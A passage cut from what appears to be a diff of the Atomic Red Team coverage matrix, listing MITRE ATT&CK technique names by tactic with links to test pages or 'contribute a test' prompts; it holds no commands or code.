Removal](../../T1531/T1531.md) | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | +| | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Unix Shell](../../T1059.004/T1059.004.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Visual Basic](../../T1059.005/T1059.005.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | | +| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | | +| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | +| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | | +| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | | +| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | | +| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hide 